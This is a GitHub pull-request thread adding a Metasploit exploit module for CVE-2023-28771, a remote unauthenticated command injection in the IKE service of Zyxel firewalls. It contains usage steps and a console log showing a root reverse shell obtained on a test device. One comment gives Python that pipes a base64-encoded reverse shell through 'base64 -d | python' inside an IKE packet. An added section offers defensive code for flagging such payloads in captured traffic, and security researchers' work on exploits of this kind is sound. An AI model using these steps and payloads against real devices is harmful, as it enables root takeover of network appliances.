
CVE-2023-28771 - Zyxel Command Injection #18016

Merged
merged 4 commits into from Jun 9, 2023

Conversation

sfewer-r7

This module exploits CVE-2023-28771, a remote unauthenticated command injection vulnerability in the Internet Key Exchange (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. For a full technical analysis of the vulnerability read the Rapid7 AttackerKB Analysis.

Testing

A physical device is required for testing. The device must be running a vulnerable firmware version prior to the vendor patch. A Zyxel USG FLEX 100 device was used during development and testing of this Metasploit module.

The attacker must be able to send UDP data to port 500 on the WAN interface of the affected network device.

Verification Steps

  1. Start msfconsole
  2. use exploit/linux/misc/zyxel_ike_decoder_rce_cve_2023_28771
  3. set RHOST <TARGET_WAN_IP>
  4. set LHOST eth0
  5. check
  6. exploit
  7. The default target 0 is a cmd/unix/reverse_bash payload. A root command shell session should be created.

@jvoisin jvoisin left a comment

Amazing work!

@jheysel-r7

Thanks for the awesome module @sfewer-r7! Would you be able to include a pcap of the module running / exploiting the physical device? This would really help whoever ends up reviewing and landing this, cheers.

@sfewer-r7

sfewer-r7 commented May 25, 2023

Thanks @jheysel-r7 , attached is a PCAP for the following session:

msf6 exploit(linux/misc/zyxel_ike_decoder_rce_cve_2023_28771) > show options

Module options (exploit/linux/misc/zyxel_ike_decoder_rce_cve_2023_28771):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.86.40    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
                                       g-metasploit.html
   RPORT    500              yes       The target port (UDP)
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.86.42    yes       The local host or network interface to listen on. This must be an address on the loca
                                       l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/misc/zyxel_ike_decoder_rce_cve_2023_28771) > check
[*] 192.168.86.40:500 - The service is running, but could not be validated. IKE detected but device vendor and service version are unknown.
msf6 exploit(linux/misc/zyxel_ike_decoder_rce_cve_2023_28771) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Command shell session 1 opened (192.168.86.42:4444 -> 192.168.86.40:39127) at 2023-05-25 09:03:52 +0100

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Jan 4 18:13:49 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
exit
[*] 192.168.86.40 - Command shell session 1 closed.
msf6 exploit(linux/misc/zyxel_ike_decoder_rce_cve_2023_28771) >

cve_2023_28771.pcapng.zip

@smcintyre-r7 smcintyre-r7 self-assigned this May 25, 2023

    'DefaultOptions' => {
    'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
    }
    }

This should be able to be replaced with the new fetch payloads, however right now it's infeasible because we don't have a MIPS64 adapter. I'll see about adding one and then we can rebase this once that's done to include it.

@fullspectrumdev

This is cursed, but the Python Meterpreter payload might work here.

I've been toying around with the exploit a little, and something like the following (Python) works... I've been playing with ever more lengthy python reverse shells/whatnot, but there is no reason a Python Meterpreter won't work.

    import base64  # needed for b64encode below; missing from the snippet as posted

    python_code = b'import socket,subprocess,os;s=socket.socket(s......[snipped]
    enc_python = base64.b64encode(python_code)
    command = f"echo '{enc_python.decode('ascii')}' | /usr/bin/base64 -d | /usr/bin/python"
    packet = build_packet(command) # build IKE packet with command (commenter's own helper, not shown)
    send_packet(packet, ip, port)  # commenter's own helper, not shown
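
As an added example (not part of this PR, the module, or any commenter's code), the following Python parses the standard ISAKMP fixed header and generic payload chain seen on UDP/500, as described in the opening post, and flags payload bodies that carry the decode-and-execute pipeline quoted in the comment above or other shell metacharacters. It is the kind of check a defender could run over captured traffic such as the attached PCAPs. It assumes only the RFC 2408 / RFC 7296 header layouts; the thread does not say which payload field the vulnerable decoder reads, so the sample datagrams (constructed here, with Vendor ID payload type 13 used purely as a carrier) and the `build_isakmp` fixture helper are assumptions, not the module's packet format.

```python
import re
import struct
from dataclasses import dataclass

# Fixed ISAKMP header (RFC 2408 / RFC 7296): initiator SPI, responder SPI,
# next payload, version (major nibble | minor nibble), exchange type, flags,
# message ID, total length.  28 bytes on the wire.
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
# Generic payload header shared by IKEv1 and IKEv2: next payload, reserved/critical, length.
PAYLOAD_HDR = struct.Struct("!BBH")

# Indicators drawn from the thread: shell metacharacters and a
# decode-and-execute pipeline ("| base64 -d | python") inside a payload body.
SHELL_META = re.compile(rb"[;|&`]|\$\(")
DECODE_EXEC = re.compile(rb"base64\s+-d|\|\s*(/usr)?/bin/(sh|bash|python)", re.I)


@dataclass
class Finding:
    offset: int        # byte offset of the payload header inside the datagram
    payload_type: int  # ISAKMP payload type number that carried the body
    reason: str


def _printable(body: bytes) -> bool:
    return bool(body) and all(0x20 <= b < 0x7F for b in body)


def parse_isakmp(datagram: bytes):
    """Parse the fixed header and walk the payload chain.

    Returns (header_dict, [(payload_type, body, offset), ...]).  Length fields
    come from untrusted input, so a bad length stops the walk instead of
    raising or reading past the buffer.
    """
    if len(datagram) < ISAKMP_HDR.size:
        raise ValueError("datagram shorter than ISAKMP header")
    ispi, rspi, nxt, ver, exch, flags, msg_id, length = ISAKMP_HDR.unpack_from(datagram, 0)
    header = {
        "ispi": ispi, "rspi": rspi,
        "version": (ver >> 4, ver & 0x0F),
        "exchange": exch, "flags": flags, "msg_id": msg_id, "length": length,
    }
    payloads = []
    off = ISAKMP_HDR.size
    while nxt != 0 and off + PAYLOAD_HDR.size <= len(datagram):
        pnext, _reserved, plen = PAYLOAD_HDR.unpack_from(datagram, off)
        if plen < PAYLOAD_HDR.size or off + plen > len(datagram):
            break  # malformed or truncated payload length: do not trust it
        payloads.append((nxt, datagram[off + PAYLOAD_HDR.size: off + plen], off))
        nxt, off = pnext, off + plen
    return header, payloads


def inspect_isakmp(datagram: bytes) -> list:
    """Flag payload bodies that look like injected shell commands."""
    findings = []
    _header, payloads = parse_isakmp(datagram)
    for ptype, body, off in payloads:
        if DECODE_EXEC.search(body):
            findings.append(Finding(off, ptype, "decode-and-execute pipeline in payload body"))
        elif _printable(body) and SHELL_META.search(body):
            # printable-only gate keeps binary payloads (keys, nonces) from tripping the metachar rule
            findings.append(Finding(off, ptype, "shell metacharacters in printable payload body"))
    return findings


def build_isakmp(payload_type: int, body: bytes, exchange: int = 2) -> bytes:
    """Constructed single-payload IKEv1 datagram used only as a test fixture (assumption, not the module's format)."""
    payload = PAYLOAD_HDR.pack(0, 0, PAYLOAD_HDR.size + len(body)) + body
    header = ISAKMP_HDR.pack(b"\x11" * 8, b"\x00" * 8, payload_type, 0x10,
                             exchange, 0, 0, ISAKMP_HDR.size + len(payload))
    return header + payload


if __name__ == "__main__":
    # Constructed samples: payload type 13 (Vendor ID) is just a carrier here.
    benign = build_isakmp(13, bytes(range(16)))
    hostile = build_isakmp(13, b"echo 'aW1wb3J0IG9z' | /usr/bin/base64 -d | /usr/bin/python")
    for name, pkt in (("benign", benign), ("hostile", hostile)):
        print(name, inspect_isakmp(pkt))
```

The metacharacter rule is gated on the body being printable ASCII because real IKE payloads (key exchange data, nonces, hashes) are binary and would otherwise match `;` or `|` by chance; the pipeline rule is specific enough to apply to any body. Payload lengths are treated as hostile: a length that runs past the datagram ends the walk rather than being trusted, which is exactly the kind of check a decoder fed from UDP/500 needs.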

sfewer-r7 and others added 2 commits June 9, 2023 09:42
…ved the separate command and dropper targets in favor of a single default target which can do both thanks to fetch payloads. Removed the redundant IO select() call which was bad copy pasta on my part.
@sfewer-r7

Hi @zeroSteiner I have rebased this pull request and reworked the module to support the fetch payloads. Tested and works great with a cmd/linux/http/mips64/meterpreter_reverse_tcp payload.

I have attached a PCAP cve_2023_28771.fetch.pcapng.zip of that working.

@smcintyre-r7 smcintyre-r7 merged commit 1284cb3 into rapid7:master Jun 9, 2023
30 checks passed
@smcintyre-r7

smcintyre-r7 commented Jun 9, 2023

Release Notes

This adds an exploit for CVE-2023-28771 which is a remote, unauthenticated OS command injection in IKE service of several Zyxel devices. Successful exploitation results in remote command execution as the root user.

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 16, 2023